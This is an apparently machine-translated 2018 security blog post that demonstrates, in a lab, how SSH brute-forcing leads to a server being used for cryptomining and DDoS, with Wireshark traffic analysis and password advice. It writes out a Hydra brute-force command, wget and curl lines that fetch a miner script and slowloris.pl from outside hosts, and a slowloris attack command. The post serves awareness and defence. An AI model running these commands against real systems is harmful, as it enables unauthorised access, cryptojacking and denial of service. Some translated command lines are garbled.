Author: cherishao (leader of the emergency response team of Xin'an Road)
In the blink of an eye, the first half of 2018 passed like this. In the work of the first half of 2018, the most common security event is that the server or the office host is remotely controlled as a chicken to mine for profits or carry out DDoS attacks on other websites. Today, share how to use the conventional SSH weak password of Linux to blow up Linux The server is also used for mining and DDoS attacks on other websites. The analysis process of attacks is relatively simple. If there is any discomfort, please correct it.
Experimental environment
The source code and domain name of the Linux server used and the site built are as follows:
Linux: Kali 2.0
IP:192.168.95.132
Website deployment source code: discuzx.7z
Deployment tool: phpstudy
Website Domain: Cherishao.com
The tools used are as follows:
SSH blasting: hydra-8.1-windows
Remote terminal management: X term
Analysis tool: Wireshark
Website building
Download discuzx source code on the Internet, use phpstudy to quickly build a station, put the source code in its www directory, and start it (read the readme.md document).
Domain name binding
Bind your own IP address to your registered domain name and add the resolution record:
Attack process
Use security tools to attack the designated platform server (the server provides common network services, such as web services, terminal services, etc.). The attack process is designed as follows:
SSH blasting
By analyzing and scanning the server of the target site (IP address: 192.168.95.132), it is found that the server opens the ssh22 port and the operating system type is Linux.
Use Hydra for SSH blasting to obtain server permission:
Hydra - l root - P Dictionary - V ssh://192.168.95.132
The (root / 123456) obtained by brute force cracking enters the server:
After connecting to the server, run the script to get the remote mining program. Server current status:
Mining with server
Get installation script
wget --no-check-certificate https://www.yiluzhuanqian.com/soft/script/mservice_2_5.sh -O mservice.sh
Execute script to start mining
Sudo bash mservice.sh 10014 ා this ID can be replaced with your own user ID
CPU status of server mining (CPU soared to 96%):
DDoS attack
Use this server to attack (website: cherishao. Com) DDoS.
Get DDoS shell from C2 server
Curl http://173.82.235.146/slowloris.pl
DDoS attack on the site
slowloris.pl -dns cherishao.com -timeout 1 - num 1000
Site uptime status:
Website status after DDoS attack:
Analysis of communication characteristic flow
Packet capturing analysis with Wireshark
Mining data flow analysis
From the above communication data flow, we can find the wallet address used by the miner:
42d4D8pASAWghyTmUS8a9yZyErA4WB18TJ6Xd2rZt9HBio2aPmAAVpHcPM8yoDEYD9Fy7eRvPJhR7SKFyTaFbSYCNZ2t3ik
Agent:
“XMRig/2.5.2”
Xig proxy feature
DDoS data flow analysis
Through analysis, we found a large number of DNS request packets for cherishao.com website:
Summary and related attachments
summary
In recent years, there are many new ways to invade the system, such as Apache Struts2 vulnerability exploitation and Hadoop yarn rest API unauthorized vulnerability exploitation. However, the old SSH brute force attack methods are not dead, but increasingly fierce.
Through such a simple design, this paper mainly wants to convey: first, hacker has obtained the authority of our system, and he can do many things, such as information stealing, data destruction, external attack and many other things that are not good for us. In daily work and life, please pay more attention to password protection strategy and strengthen their own security awareness.
Related accessories
Https://pan.baidu.com/s/1zkrmambnuhve6mw7ccqcnq password: mp3l
Reference link
SSH brute force cracking trend
http://www.freebuf.com/articles/paper/177473.html